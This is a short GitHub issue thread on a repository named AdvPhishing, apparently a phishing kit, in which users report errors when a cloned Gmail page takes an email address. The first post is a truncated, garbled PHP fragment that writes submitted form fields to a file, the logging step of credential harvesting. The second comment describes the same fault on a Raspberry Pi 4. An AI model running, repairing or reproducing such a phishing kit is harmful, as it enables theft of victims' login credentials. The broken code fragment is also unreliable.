### ISSUE TITLE
getting error after entering email id in gmail

### ISSUE THREAD

**Issue by pkmuz1** [Ignitetch/AdvPhishing#13]
$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

**Comment by pispuso** [comment]
Getting the same problem. Also some pages load, others just stay blank and other like gmail give me this same problem.
I'm on a Raspberry Pi 4 (ARM64). I don't see any errors in the installation.
